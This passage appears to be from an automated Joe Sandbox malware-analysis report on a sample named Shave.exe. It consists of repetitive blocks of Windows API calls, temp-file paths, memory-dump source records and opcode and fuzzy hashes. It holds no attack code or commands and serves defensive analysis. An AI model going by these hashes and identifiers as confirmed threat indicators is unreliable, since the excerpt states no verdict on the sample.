                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                • Opcode ID: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                                                                                                                • Instruction ID: b514363a92e965461d88eaa206c20d0702a544c8e4880045d1c7c79aac8a479e
                                                                                                                                • Opcode Fuzzy Hash: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                                                                                                                • Instruction Fuzzy Hash: 3AF05E30966A21EBC6606B24FE8CA8B7B64FB44B01711887BF001B11B4DA7C4892CBDC
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                                                                                  • Part of subcall function 00405C17: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405C25
                                                                                                                                  • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
                                                                                                                                  • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42
                                                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405CCD
                                                                                                                                • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420), ref: 00405CDD
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsa5D43.tmp
                                                                                                                                • API String ID: 3248276644-1113152414
                                                                                                                                • Opcode ID: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
                                                                                                                                • Instruction ID: 850bfc7ffc9f89e8bebb6f59b63454ed566b5c4d810398842941662e03732b0e
                                                                                                                                • Opcode Fuzzy Hash: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
                                                                                                                                • Instruction Fuzzy Hash: 82F0D625019F5216F622363A4D09AAF1954CE82364B0A013FF891722C1DB3C8942DD6E
                                                                                                                                APIs
                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,007A0F00,00000000,?,?,Call,?,?,004063D9,80000002), ref: 004061AB
                                                                                                                                • RegCloseKey.ADVAPI32(?,?,004063D9,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F00), ref: 004061B6
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                • String ID: Call
                                                                                                                                • API String ID: 3356406503-1824292864
                                                                                                                                • Opcode ID: e86e6fd2e5cb5672620ff5ab575da48d8fe54f653cf1da9627cee5843be69ab4
                                                                                                                                • Instruction ID: f8c60df0673843c4a96ed35a73ceba2ba355a7ad566f59c539dda5576aee505e
                                                                                                                                • Opcode Fuzzy Hash: e86e6fd2e5cb5672620ff5ab575da48d8fe54f653cf1da9627cee5843be69ab4
                                                                                                                                • Instruction Fuzzy Hash: B301BC72500219EADF21CF50CC09EDB3BA8EB04360F01803AFD16A6191E778D964CBA4
                                                                                                                                APIs
                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 004058A9
                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004058B6
                                                                                                                                Strings
                                                                                                                                • Error launching installer, xrefs: 00405893
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                • String ID: Error launching installer
                                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                                • Opcode ID: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                                                                                                                • Instruction ID: b039bfc1fd8153a77b97507ee8e8b42fe9752dbefc529c56e43fdfa491991b30
                                                                                                                                • Opcode Fuzzy Hash: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                                                                                                                • Instruction Fuzzy Hash: 6CE0B6F5600209BFFB00AF64ED09E7B7BACEB58605F058525BD51F2290D6B998148A78
                                                                                                                                APIs
                                                                                                                                • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75923420,004038CA,004036E0,00000006,?,00000006,00000008,0000000A), ref: 0040390C
                                                                                                                                • GlobalFree.KERNEL32(00AAF7B0), ref: 00403913
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403904
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Free$GlobalLibrary
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                • API String ID: 1100898210-823278215
                                                                                                                                • Opcode ID: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                                                                                                                • Instruction ID: 827a6d7c30b52d61f5a2dbff04e35f254d4b7381da6d9dc608e34789494937b8
                                                                                                                                • Opcode Fuzzy Hash: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                                                                                                                • Instruction Fuzzy Hash: 58E0CD334010205BC6115F04FE0475A77685F45B22F16003BFC807717147B41C538BC8
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Shave.exe,C:\Users\user\Desktop\Shave.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBE
                                                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Shave.exe,C:\Users\user\Desktop\Shave.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BCE
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharPrevlstrlen
                                                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                                                • API String ID: 2709904686-1246513382
                                                                                                                                • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                • Instruction ID: d1e11866c06308db2688671cfe2e39cf8e5f3b64411c1caee3e249c785e2e979
                                                                                                                                • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                • Instruction Fuzzy Hash: BDD05EB34109209AC3126B08DC00D9F77BCEF11301746486AF440A6161D7786C8186AD
                                                                                                                                APIs
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 6F97116A
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6F9711C7
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6F9711D9
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 6F971203
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2386745512.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2386728456.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2386788272.000000006F973000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2386807263.000000006F975000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_6f970000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1780285237-0
                                                                                                                                • Opcode ID: 2d14bd1ffd1890e482ea2ed5f90e778de45603a91b2c432fd7472276dbbf2ee7
                                                                                                                                • Instruction ID: 3b95bb6c921c44183f04204b4b44f1242019bd86ddc6864028fc09603f8ad1fd
                                                                                                                                • Opcode Fuzzy Hash: 2d14bd1ffd1890e482ea2ed5f90e778de45603a91b2c432fd7472276dbbf2ee7
                                                                                                                                • Instruction Fuzzy Hash: 22318CB2508321DBEB308F7CD955A6677E8FB57720B00062AE844DB295EF35E8918F61
                                                                                                                                APIs
                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
                                                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D1A
                                                                                                                                • CharNextA.USER32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D2B
                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 190613189-0
                                                                                                                                • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                • Instruction ID: 076f441daad098c1e87a0755c7bbd60db18a276d6ce73f7d9d897af98e652dc6
                                                                                                                                • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                • Instruction Fuzzy Hash: E5F0F631204918FFC7129FA4DD0499FBBB8EF06354B2580BAE840FB211D674DE01AFA8
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Xaq$Xaq$Xaq$Xaq$Xaq$Xaq
                                                                                                                                • API String ID: 0-499371476
                                                                                                                                • Opcode ID: 31dd5c624c43f10c95a70351146f6093d9916e8c44e71c5157cd28c808bbb579
                                                                                                                                • Instruction ID: 25f1638fbf853bdbedca29ba1ab9e57d675f09bba56f47c347530b9683a55a05
                                                                                                                                • Opcode Fuzzy Hash: 31dd5c624c43f10c95a70351146f6093d9916e8c44e71c5157cd28c808bbb579
                                                                                                                                • Instruction Fuzzy Hash: 59326D6684D7D48FCB638B7848E815B7FB16F82205B8945DFC4D78B687DB28C609C362
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                                                • API String ID: 0-1229222154
                                                                                                                                • Opcode ID: e61419d8b98c72f336042e8965ba84a5889e32d096cf3d184a83781aab89aa80
                                                                                                                                • Instruction ID: bb1885aa7003f1960e681075794e30332fcfb03913091897f305254f0985150f
                                                                                                                                • Opcode Fuzzy Hash: e61419d8b98c72f336042e8965ba84a5889e32d096cf3d184a83781aab89aa80
                                                                                                                                • Instruction Fuzzy Hash: 4991F774E00618CFDB18DFA9C894A9DBBF2BF89301F15C0A9D819AB365DB349985CF10
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                                                • API String ID: 0-1229222154
                                                                                                                                • Opcode ID: 8a53c557fbe0ce47ef9791f07829e9d2ff99986bf9d48a60e2f921b42f467c67
                                                                                                                                • Instruction ID: b0dbf31f1c9c3cfbbcca4b78b19e2528946aaf8c4ff16971a912755746450698
                                                                                                                                • Opcode Fuzzy Hash: 8a53c557fbe0ce47ef9791f07829e9d2ff99986bf9d48a60e2f921b42f467c67
                                                                                                                                • Instruction Fuzzy Hash: 4681D674E00218CFDB18DFAAC884A9DBBF2BF89301F14D069E819AB365DB349945CF50
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                                                • API String ID: 0-1229222154
                                                                                                                                • Opcode ID: a8dd65cef3a3c70eb4b323071c1c39d11ca20952f9d3efc826b5c04455a08126
                                                                                                                                • Instruction ID: 6c5ed276ca7c05f3efe2b762fb2a682b979f19f8ea41af862fbbc38bc6c4bd5e
                                                                                                                                • Opcode Fuzzy Hash: a8dd65cef3a3c70eb4b323071c1c39d11ca20952f9d3efc826b5c04455a08126
                                                                                                                                • Instruction Fuzzy Hash: DA81B474E00218CFDB58DFAAD894A9DBBF2BF89301F14C069E819AB365DB349945CF50
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                                                • API String ID: 0-1229222154
                                                                                                                                • Opcode ID: 3f051da7869ec3f3888122eb0337edaae5ed3c253180d5843757cd33a4a4fcd2
                                                                                                                                • Instruction ID: 8b5bc1ace3d0b8b3deaccb135d1e5582aad461b133986ed771a721db0214e0f2
                                                                                                                                • Opcode Fuzzy Hash: 3f051da7869ec3f3888122eb0337edaae5ed3c253180d5843757cd33a4a4fcd2
                                                                                                                                • Instruction Fuzzy Hash: 4781C774E00258CFDB14DFAAD884A9DBBF2BF89301F14C069E819AB365DB34A945CF50
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                                                • API String ID: 0-1229222154
                                                                                                                                • Opcode ID: 0709e9ba7f027a74554fa378b0accee2ed06ea48518dc8287322bb466afa35e5
                                                                                                                                • Instruction ID: dfa26a8f641678347a1a27eb7f5c76879314b7fe5ebc7bc0dae94e50a8c0b361
                                                                                                                                • Opcode Fuzzy Hash: 0709e9ba7f027a74554fa378b0accee2ed06ea48518dc8287322bb466afa35e5
                                                                                                                                • Instruction Fuzzy Hash: 7A81A374E00218CFDB18DFAAD994A9DBBF2BF89301F14C069E819AB365DB349945CF50
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
